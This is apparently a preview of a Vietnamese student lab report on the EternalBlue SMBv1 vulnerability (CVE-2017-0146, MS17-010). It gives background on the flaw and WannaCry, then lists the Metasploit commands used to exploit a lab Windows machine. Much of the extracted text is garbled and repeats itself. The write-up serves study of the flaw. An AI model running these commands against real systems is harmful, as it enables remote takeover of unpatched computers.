Đang tải... (xem toàn văn)
cve20170146, cve20170144, Server Message Block , EternalBlue, Tìm hiểu và thực nghiệm về lỗ hổng CVE 20170146, Tìm hiểu và thực nghiệm về lỗ hổng CVE 20170144, Tồn tại nhiều lỗ hổng thực thi mã từ xa trong Microsoft Server Message Block 1.0 (SMBv1) do xử lý không đúng các yêu cầu nhất định. Kẻ tấn công từ xa, không được xác thực có thể khai thác các lỗ hổng này, thông qua một gói được chế tạo đặc biệt, để thực thi mã tùy ý. (CVE2017–0143, CVE2017–0144, CVE2017–0145, CVE2017–0146, CVE2017–0148). Máy chủ SMBv1 trong Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; và Windows Server 2016 cho phép kẻ tấn công từ xa thực thi mã tùy ý thông qua các gói được tạo thủ công, hay còn gọi là Windows SMB Remote Code Execution Vulnerability.“The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka Windows SMB Remote Code Execution Vulnerability. This vulnerability is different from those described in CVE20170143, CVE20170144, CVE20170145, and CVE20170148.
CHƯƠNG 1: Tìm hiểu lỗ hổng cve-2017-0146 - Tồn nhiều lỗ hổng thực thi mã từ xa Microsoft Server Message Block 1.0 (SMBv1) xử lý không yêu cầu định Kẻ công từ xa, khơng xác thực khai thác lỗ hổng này, thơng qua gói chế tạo đặc biệt, để thực thi mã tùy ý (CVE-2017–0143, CVE-2017–0144, CVE-2017–0145, CVE-2017–0146, CVE-2017–0148) - Máy chủ SMBv1 Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016 cho phép kẻ công từ xa thực thi mã tùy ý thơng qua gói tạo thủ cơng, hay cịn gọi "Windows SMB Remote Code Execution Vulnerability.“ - Server Message Block (SMB) là một giao thức chia sẻ file khá phổ biến nền tảng Windows của Microsoft Nhờ vào giao thức SMB này mà các máy tính Windows kết nối với cùng một lớp mạng hay cùng một Domain có thể chia sẻ file được với Cho đến nay, SMB cịn có tên gọi khác Common Internet File Sharing (CIFS) - EternalBlue một mã khai thác thông tin, dựa vào lỗ hổng của giao thức SMB thông qua cổng 445 Ban đầu, EternalBlue phát triển Cục An Ninh Quốc Gia Hoa Kỳ (NSA) Tên đầy đủ tiếng Anh là U.S National Security Agency Nhưng sau đó, nó bị rị rỉ nhóm Hacker The Shadow Brokens vào năm 2017 Cũng cùng năm đó Một đợt tấn công quy mô lớn của Virus mã hoá dữ liệu – Ransomware, nhằm vào các máy tính chạy Windows của Microsoft, diễn toàn thế giới Trong đó, nổi tiếng nhất vẫn là virus WannaCry Cho đến mặc dù lỗ hổng này đã được vá bởi Microsoft bằng bản cập nhật bảo mật MS17-010 Tuy nhiên, thế giới một số lượng lớn máy tính chạy Hệ điều hành Windows vẫn còn tồn tại lỗ hổng Lỗ hổng này công bố CVE-2017-0146 (Windows SMB Remote Code Execution Vulnerability) Lỗ hổng này vô cùng nguy hiểm và rất dễ dàng bị khai thác Điều đáng nói là để tấn công qua lỗ hổng giao thức SMB này Hacker không cần phải gởi hay lừa cho nạn nhân tải về hoặc chạy bất kì một virus độc hại nào đó Tức là nạn nhân cho dù không làm gì cả vẫn bị hacker dễ dàng tấn công chiếm quyền điều khiển máy tính mà không hề hay biết Trang CHƯƠNG 2: THỰC NGHIỆM - Trong bài lab ta sẽ sử dụng hai máy tính để mô phỏng một cuộc tấn công dựa vào lỗ hổng giao thức SMB của Hệ điều hành Windows Một máy chạy HĐH Kali Linux, đóng vai trò kẻ tấn công (hacker) Và một máy tính đóng vai trò là máy nạn nhân (victim) Máy victim chạy Hệ điều hành Windows 64 bit có chứa lỗ hổng SMB Để làm được điều này, máy Kali Linux ta sẽ sử dụng mã khai thác có tên là EternalBlue để tấn công vào máy Windows - Đăng nhập vào Metasploit bằng câu lệnh: # msfconsole Trang - Khi đã vào được Metasploit ta tìm kiếm những lỗi cũng các cú pháp liên quan đến ms17_010 bằng lệnh: # search eternalblue Trang - Tiếp tục dùng lệnh: # use exploit/windows/smb/ms17_010_eternalblue - Ta set RHOST máy muốn check Ở là máy victim nên ta set sau: # set rhosts 192.168.224.129 Sau đó, gõ lệnh: # run để tiến hành kiểm tra xem máy victim có dính lỗi hay không - Như hình thì máy victim có tồn tại lỗ hổng có thể khai thác được Ta chú ý dòng chữ “Host is likely VULNERABLE to MS17-010!” được đánh dấu Trang - Truy cập vào tạo folder Trang Trang Trang - Kết quả: ta tạo folder bên máy bị công Trang ... số lượng lớn máy tính chạy Hệ điều hành Windows vẫn còn tồn tại lỗ hổng Lỗ hổng này công bố CVE- 2017- 0146 (Windows SMB Remote Code Execution Vulnerability) Lỗ hổng này vô cùng... khác Common Internet File Sharing (CIFS) - EternalBlue một mã khai thác thông tin, dựa vào lỗ hổng của giao thức SMB thông qua cổng 445 Ban đầu, EternalBlue phát triển Cục An Ninh Quốc... U.S National Security Agency Nhưng sau đó, nó bị rị rỉ nhóm Hacker The Shadow Brokens vào năm 2017 Cũng cùng năm đó Một đợt tấn công quy mô lớn của Virus mã hoá dữ liệu – Ransomware,